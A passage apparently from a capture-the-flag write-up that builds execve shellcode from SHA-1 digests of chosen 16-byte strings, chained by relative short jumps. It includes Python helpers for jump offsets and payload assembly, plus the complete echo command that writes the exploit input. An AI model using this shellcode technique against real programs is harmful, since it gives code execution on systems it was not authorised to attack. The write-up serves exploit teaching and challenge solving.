taglR8DRWWJmg8Ss :   (end) cdq, push rdx, push rdi
EI6Tlq7y76Vh5hyN : (start) jmp 2
ygX8lQIoZ4Ln5EjX :   (end) push rsp, pop rsi
EI6Tlq7y76Vh5hyN : (start) jmp 2
9tyObcwpkagTLtEh :   (end) mov al, 0x3b
EI6Tlq7y76Vh5hyN : (start) jmp 2
JtZj2STVLXTitmQD :   (end) syscall

The number behind jmp (2 or 3) says whether it jumps to 2 or 3 bytes before the end of the next hash. Because jumps are relative and not absolute, it is always the same hash: qzg3NxCyYGweMVIr == jump to the last 3 bytes of the next hash and EI6Tlq7y76Vh5hyN == jump to the last 2 bytes of the next hash.
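The displacement byte of those jumps can be worked out by hand. The sketch below assumes that the 20 byte digests end up back to back in memory and that a short jump (0xeb plus a signed 8-bit displacement) is relative to the address right after the jump instruction. The spacing is an assumption, but it agrees with the value 35 that the bruteforce code checks for. The function name jmp_rel8 is made up.

```python
DIGEST_LEN = 20   # a SHA-1 digest is 20 bytes long
JMP_LEN = 2       # short jump: opcode 0xeb followed by an 8-bit displacement

def jmp_rel8(tail_len, jmp_offset=0):
    """Displacement for a short jump located at `jmp_offset` inside one digest
    that should land on the last `tail_len` bytes of the following digest."""
    target = DIGEST_LEN + (DIGEST_LEN - tail_len)   # counted from the start of this digest
    return target - (jmp_offset + JMP_LEN)

print("jmp 3:", jmp_rel8(3))                              # last 3 bytes of the next hash
print("jmp 2:", jmp_rel8(2))                              # last 2 bytes of the next hash
print("jmp 2 after 1 leftover byte:", jmp_rel8(2, jmp_offset=1))
```

The third call models the "part shl and jmp 2" chunk under the assumption that one leftover byte of the shl precedes the jump.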

Now we can put the full string together, with \x3a\x00\x00\x00 as prefix to pass the first check, followed by the 16 byte chunks for the sha1 hashes:

echo "\x3a\x00\x00\x00ikLEsXBe58oJIuFLCYOEsiM5zOvynLcZEI6Tlq7y76Vh5hyNS61SFzdOBn3zyrBfEI6Tlq7y76Vh5hyNzihgN1OfifVotOPsqzg3NxCyYGweMVIrczbdI1dngWv4nbYvEI6Tlq7y76Vh5hyNUqZhIrIoQrZu29qMEI6Tlq7y76Vh5hyNgMq4RKcD34SOoMpkqzg3NxCyYGweMVIrj90mqufCQHUY7DFIBkrI3NqemVnl6iq2l05Y1tnrwjQGa9GBEI6Tlq7y76Vh5hyNmqKoGcLyK8fi3kSHqzg3NxCyYGweMVIrhVoED3xi4I5kTghSEI6Tlq7y76Vh5hyN70hQz3yujDwrWyEiEI6Tlq7y76Vh5hyNJcGdue7SlbVZ2lpgqzg3NxCyYGweMVIrXJodA3GFNyfC5mp1qzg3NxCyYGweMVIrCzoXGfRlsiDKfS4Hqzg3NxCyYGweMVIrfgnxUdbfK3yemOIHqzg3NxCyYGweMVIrtaglR8DRWWJmg8SsEI6Tlq7y76Vh5hyNygX8lQIoZ4Ln5EjXEI6Tlq7y76Vh5hyN9tyObcwpkagTLtEhEI6Tlq7y76Vh5hyNJtZj2STVLXTitmQD`python -c 'print \"A\"*0x3e8'`" > asd
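The same file can also be assembled without relying on how the shell treats escape sequences. A minimal Python sketch, assuming the layout described above (a 4 byte little-endian chunk count followed by 16 byte chunks); build_payload and its declared_count parameter are made-up names.

```python
import struct

CHUNK_LEN = 16

def build_payload(chunks, declared_count=None):
    """Prefix the chunks with their count as a 4 byte little-endian integer.
    If declared_count is larger than len(chunks), pad the rest with 'A's."""
    for chunk in chunks:
        if len(chunk) != CHUNK_LEN:
            raise ValueError("every chunk must be exactly 16 bytes long")
    count = len(chunks) if declared_count is None else declared_count
    if count < len(chunks):
        raise ValueError("declared_count is smaller than the number of chunks")
    padding = b"A" * (CHUNK_LEN * (count - len(chunks)))
    return struct.pack("<I", count) + b"".join(chunks) + padding

# Only the first two chunks of the table, for illustration.
payload = build_payload([b"ikLEsXBe58oJIuFL", b"CYOEsiM5zOvynLcZ"], declared_count=0x3a)
print(len(payload), payload[:4])
```

Writing the result to disk with open("asd", "wb").write(payload) would correspond to the redirect in the echo command.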